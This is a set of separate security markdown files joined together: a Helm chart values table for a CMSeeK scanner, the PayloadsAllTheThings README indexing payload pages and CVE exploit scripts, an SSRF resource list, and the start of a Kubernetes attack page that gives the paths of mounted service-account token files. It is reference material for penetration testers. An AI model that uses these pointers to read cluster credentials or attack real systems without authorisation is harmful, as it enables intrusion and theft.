| scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) |
| scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) |
| scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| scanner.image.repository | string | `"docker.io/securecodebox/scanner-cmseek"` | Container Image to run the scan |
| scanner.image.tag | string | `nil` | defaults to the charts appVersion |
| scanner.nameAppend | string | `nil` | append a string to the default scantype name. |
| scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) |
| scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":true}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated |
| scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. |
| scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode |
| scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system |
| scanner.securityContext.runAsNonRoot | bool | `true` | Enforces that the scanner image is run as a non root user |
| scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
## License
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license].
[scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox
[scb-docs]: https://docs.securecodebox.io/
[scb-site]: https://www.securecodebox.io/
[scb-github]: https://github.com/secureCodeBox/
[scb-twitter]: https://twitter.com/secureCodeBox
[scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU
[scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
|
# Payloads All The Things
A list of useful payloads and bypasses for Web Application Security.
Feel free to improve with your payloads and techniques !
I <3 pull requests :)
You can also contribute with a beer IRL or with `buymeacoffee.com`
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
- README.md - vulnerability description and how to exploit it
- Intruder - a set of files to give to Burp Intruder
- Images - pictures for the README.md
- Files - some files referenced in the README.md
You might also like :
- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
- [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)
- [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
- [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md)
- [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
- [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
- [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
- Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
- Apache Struts 2 CVE-2017-5638.py
- Apache Struts 2 CVE-2017-9805.py
- Apache Struts 2 CVE-2018-11776.py
- Docker API RCE.py
- Drupalgeddon2 CVE-2018-7600.rb
- Heartbleed CVE-2014-0160.py
- JBoss CVE-2015-7501.py
- Jenkins CVE-2015-8103.py
- Jenkins CVE-2016-0792.py
- Shellshock CVE-2014-6271.py
- Tomcat CVE-2017-12617.py
- WebLogic CVE-2016-3510.py
- WebLogic CVE-2017-10271.py
- WebLogic CVE-2018-2894.py
- WebSphere CVE-2015-7450.py
## Try Harder
Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
- __Bug Bounty Platforms__
- [HackerOne](https://hackerone.com)
- [BugCrowd](https://bugcrowd.com)
- [Bounty Factory](https://bountyfactory.io)
- [Synack](https://www.synack.com/)
- [Intigriti](https://www.intigriti.com)
- [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
- __Online Platforms__
- [Hack The Box](https://hackthebox.eu/)
- [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
- [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
- [Zenk-Security](https://www.zenk-security.com/epreuves.php)
- [Root-Me](https://www.root-me.org)
- [W3Challs](https://w3challs.com/)
- [NewbieContest](https://www.newbiecontest.org/)
- [Vulnhub](https://www.vulnhub.com/)
- [The Cryptopals Crypto Challenges](https://cryptopals.com/)
- [alert(1) to win](https://alf.nu/alert1)
- [Hacksplaining](https://www.hacksplaining.com/exercises)
- [HackThisSite](https://hackthissite.org)
- [Hackers.gg](hackers.gg)
- [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
## Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
- [Web Hacking 101](https://leanpub.com/web-hacking-101)
- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
- [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
## More resources
### Blogs/Websites
- [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
- [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
- [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
- [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
- [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
- [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
### Youtube
- [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
- [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
- [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
|
# AllThingsSSRF
**This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location**
This is currently work in progress I will add more resources as I find them.
![SSRF Logo](/images/ssrf.jpg)
### Created By [@jdonsec](https://twitter.com/jdonsec)
---
#### Learn What is SSRF
- [Vickie Li: Intro to SSRF](https://medium.com/swlh/intro-to-ssrf-beb35857771f)
- [Vickie Li: Exploiting SSRFs](https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437)
- [Detectfy - What is server side request forgery (SSRF)?](https://blog.detectify.com/2019/01/10/what-is-server-side-request-forgery-ssrf/)
- [What is SSRF By Netsparker](https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/)
- [Hackerone How To: Server-Side Request Forgery(SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
- [Nahamsec/Daeken - OWNING THE CLOUT THROUGH SSRF AND PDF GENERATORS](https://docs.google.com/presentation/d/1JdIjHHPsFSgLbaJcHmMkE904jmwPM4xdhEuwhy2ebvo/edit#slide=id.p)
- [Orange Tsai A New Era of SSRF - Exploiting URL Parser in
Trending Programming Languages!](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)
- [Infosec Institute SSRF Introduction](https://resources.infosecinstitute.com/the-ssrf-vulnerability/)
- [SSRF bible](https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/SSRFbible%20Cheatsheet.pdf)
- [Book of Bugbounty Tips](https://gowsundar.gitbook.io/book-of-bugbounty-tips/ssrf)
- [Cujanovic - SSRF Testing](https://github.com/cujanovic/SSRF-Testing)
- [EdOverflow - Bugbounty-Cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md)
- [@ONsec_lab SSRF pwns: New techniques and stories](https://conference.hitb.org/hitbsecconf2013ams/materials/D1T1%20-%20Vladimir%20Vorontsov%20and%20Alexander%20Golovko%20-%20SSRF%20PWNs%20-%20New%20Techniques%20and%20Stories.pdf)
- [Swissky - Payload All The Things SSRF](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
- [HAHWUL](https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html)
- [Acunetix - What is Server Side Request Forgery(SSRF)?](https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/)
- [xI17dev - SSRF Tips](https://blog.safebuff.com/2016/07/03/SSRF-Tips/)
- [SaN ThosH SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
- [SaN ThosH SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-2](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0)
- [AUXY Blog - SSRF in Depth](http://www.auxy.xyz/research/2017/07/06/all-ssrf-knowledge.html)
- [CTF Wiki - SSRF Introduction](https://ctf-wiki.github.io/ctf-wiki/web/ssrf/)
- [Orangetw - CTF SSRF Writeup](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/README.md#ssrfme)
#### Writeups
- [@leonmugen: SSRF Reading Local Files from DownNotifier server](https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/)
- [Fireshell Security Team: SunshineCTF - Search Box Writeup](https://fireshellsecurity.team/sunshinectf-search-box/)
- [SSRF vulnerability via FFmpeg HLS processing](https://medium.com/@valeriyshevchenko/ssrf-vulnerability-via-ffmpeg-hls-processing-f3823c16f3c7)
- [Escalating SSRF to RCE](https://medium.com/cesppa/escalating-ssrf-to-rce-f28c482eb8b9)
- [Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!](https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326)
- [Chris Young: SSRF - Server Side Request Forgery](https://chris-young.net/2018/04/13/ssrf-server-side-request-forgery/)
- [Day Labs: SSRF attack using Microsoft's bing webmaster central](https://blog.0daylabs.com/2015/08/09/SSRF-in-Microsoft-bing/)
- [Elber Andre: SSRF Tips SSRF/XSPA in Microsoft’s Bing Webmaster Central](https://medium.com/@elberandre/ssrf-trick-ssrf-xspa-in-microsofts-bing-webmaster-central-8015b5d487fb)
- [Valeriy Shevchenko: SSRF Vulnerability due to Sentry misconfiguration](https://medium.com/@valeriyshevchenko/ssrf-vulnerability-due-to-sentry-misconfiguration-5e758bdb4e44)
- [Vickie Li: Bypassing SSRF Protection](https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b)
- [Vickie Li: SSRF in the Wild](https://medium.com/swlh/ssrf-in-the-wild-e2c598900434)
- [Tug Pun: From SSRF to Local File Disclosure](https://medium.com/@tungpun/from-ssrf-to-local-file-disclosure-58962cdc589f)
- [Neeraj Sonaniya: Reading Internal Files using SSRF vulnerability](https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb)
- [Pratik yadav: Ssrf to Read Local Files and Abusing the AWS metadata](https://medium.com/@pratiky054/ssrf-to-read-local-files-and-abusing-the-aws-metadata-8621a4bf382)
- [Shorebreak Security: SSRF’s up! Real World Server-Side Request Forgery (SSRF)](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
- [Hack-Ed: A Nifty SSRF Bug Bounty Write Up](https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/)
- [abcdsh Asis 2019 Quals - Baby SSRF](https://abcdsh.blogspot.com/2019/04/writeup-asis-2019-quals-baby-ssrf.html)
- [W00troot: How I found SSRF on TheFacebook.com](https://w00troot.blogspot.com/2017/12/how-i-found-ssrf-on-thefacebookcom.html)
- [Deepak Holani: Server Side Request Forgery(SSRF){port issue hidden approch }](https://medium.com/@w_hat_boy/server-side-request-forgery-ssrf-port-issue-hidden-approch-f4e67bd8cc86)
- [Brett Buerhaus: SSRF Writeups](https://buer.haus/tag/ssrf/)
- [GeneralEG: Escalating SSRF to RCE](https://generaleg0x01.com/2019/03/10/escalating-ssrf-to-rce/)
- [Coen Goedegebure: How I got access to local AWS info via Jira](https://www.coengoedegebure.com/how-i-got-access-to-local-aws-info-via-jira/)
- [Corben Leo: Hacking the Hackers: Leveraging an SSRF in HackerTarget](https://www.corben.io/hackertarget/)
- [Orange Tsai: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
- [Peter Adkins: Pivoting from blind SSRF to RCE with HashiCorp Consul](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html)
- [pwntester: hackyou2014 Web400 write-up](http://www.pwntester.com/tag/ssrf/)
- [Azure Assassin Alliance SSRF Me](https://ctftime.org/writeup/16067)
- [003Random’s Blog: H1-212 CTF ~ Write-Up](https://poc-server.com/blog/2017/11/20/h1-212-ctf-write-up/)
- [Bubounty POC SSRF Bypass in private website](https://bugbountypoc.com/ssrf-bypass-in-private-website/)
- [Peerlyst: Top SSRF Posts](https://www.peerlyst.com/tags/ssrf)
- [Elber "f0lds" Tavares: $1.000 SSRF in Slack](https://fireshellsecurity.team/1000-ssrf-in-slack/)
- [Kongweinbin: Write-up for Gemini Inc: 1](https://kongwenbin.com/write-up-for-gemini-inc-1/#more-1548)
- [LiveOverFlow: SSRF targeting redis for RCE via IPv6/IPv4 address embedding chained with CLRF injection in the git:// protocol.](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/)
- [GitLab SSRF in project integrations (webhook)](https://gitlab.com/gitlab-org/gitlab-ce/issues/53242)
- [Maxime Leblanc: Server-Side Request Forgery (SSRF) Attacks - Part 1: The basics](https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a)
- [Maxime Leblanc: Server-Side Request Forgery (SSRF) Attacks — Part 2: Fun with IPv4 addresses](https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-2-fun-with-ipv4-addresses-eb51971e476d)
- [Maxime Leblanc: Server-Side Request Forgery (SSRF) — Part 3: Other advanced techniques](https://medium.com/poka-techblog/server-side-request-forgery-ssrf-part-3-other-advanced-techniques-3f48cbcad27e)
- [Maxime Leblanc: Privilege escalation in the Cloud: From SSRF to Global Account Administrator](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6)
- [Asterisk Labs: Server-side request forgery in Sage MicrOpay ESP](https://labs.asteriskinfosec.com.au/tag/ssrf/)
- [EdOverflow: Operation FGTNY 🗽 - Solving the H1-212 CTF](https://edoverflow.com/2017/h1-212-ctf/)
- [Alyssa Herrera: Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
- [Alyssa Herrera: Wappalyzer SSRF Write up](https://medium.com/@alyssa.o.herrera/wappalyzer-ssrf-write-up-2dab4df064ae)
- [Contribution by $root: Whomai - Harsh Jaiswal: Vimeo SSRF with code execution potential.](https://medium.com/@rootxharsh_90844/vimeo-ssrf-with-code-execution-potential-68c774ba7c1e)
- [Agarri: Server-side browsing considered harmful](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
#### Hackerone Reports
- [#223203 SVG Server Side Request Forgery (SSRF)](https://hackerone.com/reports/223203)
- [115857 SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)
- [237381 SSRF and local file disclosure in https://wordpress.com/media/videos/ via FFmpeg HLS processing](https://hackerone.com/reports/237381)
- [228377 SSRF in upload IMG through URL](https://hackerone.com/reports/228377)
- [302885 ImageMagick GIF coder vulnerability leading to memory disclosure](https://hackerone.com/reports/302885)
- [392859 Sending Emails from DNSDumpster - Server-Side Request Forgery to Internal SMTP Access](https://hackerone.com/reports/392859)
- [395521 SSRF vulnerability on proxy.duckduckgo.com (access to metadata server on AWS)](https://hackerone.com/reports/395521)
- [285380 www.threatcrowd.org - SSRF : AWS private key disclosure](https://hackerone.com/reports/285380)
- [287762 SSRF protection bypass](https://hackerone.com/reports/287762)
- [115748 SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
- [508459 SSRF in webhooks leads to AWS private keys disclosure](https://hackerone.com/reports/508459)
- [643622 SSRF In Get Video Contents](https://hackerone.com/reports/643622)
- [398641 D0nut: SSRF on duckduckgo.com/iu/](https://hackerone.com/reports/398641)
- [398799 Jobert Abma (jobert): Unauthenticated blind SSRF in OAuth Jira authorization controller](https://hackerone.com/reports/398799)
- [369451 Dylan Katz (plazmaz): SSRF in CI after first run](https://hackerone.com/reports/369451)
- [341876 André Baptista (0xacb): SSRF in Exchange leads to ROOT access in all instances](https://hackerone.com/reports/341876)
- [374737 ruvlol (ruvlol): Blind SSRF on errors.hackerone.net due to Sentry misconfiguration](https://hackerone.com/reports/374737)
- [386292 Elb (elber): Bypass of the SSRF protection in Event Subscriptions parameter](https://hackerone.com/reports/386292)
- [411865 Robinooklay: Blind SSRF at https://chaturbate.com/notifications/update_push/](https://hackerone.com/reports/411865)
- [517461 Ninja: Blind SSRF/XSPA on dashboard.lob.com + blind code injection](https://hackerone.com/reports/517461)
- [410882 Steven Seeley: Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical)](https://hackerone.com/reports/410882)
- [395521 Predrag Cujanović: SSRF vulnerability on proxy.duckduckgo.com (access to metadata server on AWS)](https://hackerone.com/reports/395521)
- [223203 floyd: SVG Server Side Request Forgery (SSRF)](https://hackerone.com/reports/223203)
- [301924 jax: SSRF vulnerability in gitlab.com webhook](https://hackerone.com/reports/301924)
- [204513 Skansing: Infrastructure - Photon - SSRF](https://hackerone.com/reports/204513)
- [115748 Eugene Farfel: SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
- [263169 Tung Pun: New Relic - Internal Ports Scanning via Blind SSRF](https://hackerone.com/reports/263169)
- [280511 Suresh Narvaneni: Server Side Request Forgery on JSON Feed](https://hackerone.com/reports/280511)
- [281950 Tung Pun: Infogram - Internal Ports Scanning via Blind SSRF](https://hackerone.com/reports/281950)
- [289187 Predrag Cujanović: DNS pinning SSRF](https://hackerone.com/reports/289187)
- [288183 Dr.Jones: SSRF bypass for https://hackerone.com/reports/285380 (query AWS instance)](https://hackerone.com/reports/288183)
- [288537 e3xpl0it: Server Side Request Forgery protection bypass № 2](https://hackerone.com/reports/288537)
- [141304 ylujion: Blind SSRF on synthetics.newrelic.com](https://hackerone.com/reports/141304)
- [128685 Nicolas Grégoire: SSRF on testing endpoint](https://hackerone.com/reports/128685)
- [145524 paglababa: Server side request forgery (SSRF) on nextcloud implementation.](https://hackerone.com/reports/145524)
- [115857 Slim Shady: SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)
#### Videos/POC
- [Black Hat: Viral Video - Exploiting SSRF in Video Converters](https://www.youtube.com/watch?v=tZil9j7TTps&feature=youtu.be)
- [Hackerone: Hacker101 - SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
- [Bugcrowd University: Server Side Request Forgery](https://www.bugcrowd.com/resources/webinars/server-side-request-forgery/)
- [Muhammad Junaid: Yahoo SSRF and Local File Disclosure via FFmpeg](https://www.youtube.com/watch?v=3Z_f69OIQuw)
- [Muhammad Junaid: Flickr (Yahoo!) SSRF and Local File Disclosure](https://www.youtube.com/watch?v=v3YQqTb5geU)
- [Corben Leo: SMTP Access via SSRF in HackerTarget API](https://www.youtube.com/watch?v=F_sC_OrSkIc)
- [Nikhil Mittal: HootSuite SSRF Vulnerability POC](https://www.youtube.com/watch?v=L9bGSNmlJXU)
- [Hack In The Box Security Conference: HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
- [Crazy Danish Hacker: Server-Side Request Forgery (SSRF) - Web Application Security Series #1](https://www.youtube.com/watch?v=K_ElxRc9LLk)
- [LiveOverFlow: PHP include and bypass SSRF protection with two DNS A records - 33c3ctf list0r (web 400)](https://www.youtube.com/watch?v=PKbxK2JH23Y)
- [Nahamsec: Owning the Clout through SSRF & PDF Generators - Defcon 27 - (SSRF on ads.snapchat.com)](https://www.youtube.com/watch?v=Gcab8sLBmnk)
- [Tutorials Point (India) Pvt. Ltd: Penetration Testing - Server Side Request Forgery (SSRF)](https://www.youtube.com/watch?v=_IVjvNelzMw)
- [Hack In The Box Security Conference: HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
- [AppSec EU15 - Nicolas Gregoire - Server-Side Browsing Considered Harmful](https://www.youtube.com/watch?v=8t5-A4ASTIU)
#### Tools
- [Bcoles - SSRF Proxy](https://bcoles.github.io/ssrf_proxy/)
- [Daeken - SSRFTest](https://github.com/daeken/SSRFTest)
- [Daeken - httptrebind](https://github.com/daeken/httprebind)
#### CTF/Labs
- [Bugbounty Notes SSRF Challenge](https://www.bugbountynotes.com/challenge?id=33)
- [Portswigger SSRF labs](https://portswigger.net/web-security/ssrf)
- [m6a-UdS SSRF Lab](https://github.com/m6a-UdS/ssrf-lab)
- [Pentester Lab Pro account: Essential: Server Side Request Forgery 01](https://pentesterlab.com/exercises/ssrf_01/course)
- [Pentester Lab Pro account: Essential: Server Side Request Forgery 02](https://pentesterlab.com/exercises/ssrf_02/course)
- [Pentester Lab Pro account: Essential: Server Side Request Forgery 03](https://pentesterlab.com/exercises/ssrf_03/course)
- [Pentester Lab Pro account: Essential: Server Side Request Forgery 04](https://pentesterlab.com/exercises/ssrf_04/course)
- [Se8S0n SSRF Lab Guide](https://se8s0n.github.io/2019/05/19/SSRF-LABS%E6%8C%87%E5%8D%97/)
|
# Kubernetes
> Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
## Summary
- [Tools](#tools)
- [Container Environment](#container-environment)
- [Information Gathering](#information-gathering)
- [RBAC Configuration](#rbac-configuration)
- [Listing Secrets](#listing-secrets)
- [Access Any Resource or Verb](#access-any-resource-or-verb)
- [Pod Creation](#pod-creation)
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
- [Privileged Service Account Token](#privileged-service-account-token)
- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
- [API addresses that you should know](#api-addresses-that-you-should-know)
- [References](#references)
## Tools
* [kubeaudit](https://github.com/Shopify/kubeaudit) - Audit Kubernetes clusters against common security concerns
* [kubesec.io](https://kubesec.io/) - Security risk analysis for Kubernetes resources
* [kube-bench](https://github.com/aquasecurity/kube-bench) - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/)
* [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Hunt for security weaknesses in Kubernetes clusters
* [katacoda](https://katacoda.com/courses/kubernetes) - Learn Kubernetes using interactive broser-based scenarios
* [kubescape](https://github.com/armosec/kubescape) - Automate Kubernetes cluster scans to identify security issues
## Container Environment
Containers within a Kubernetes cluster automatically have certain information made available to them through their [container environment](https://kubernetes.io/docs/concepts/containers/container-environment/). Additional information may have been made available through the volumes, environment variables, or the downward API, but this section covers only what is made available by default.
### Service Account
Each Kubernetes pod is assigned a service account for accessing the Kubernetes API. The service account, in addition to the current namespace and Kubernetes SSL certificate, are made available via a mounted read-only volume:
```
/var/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
```
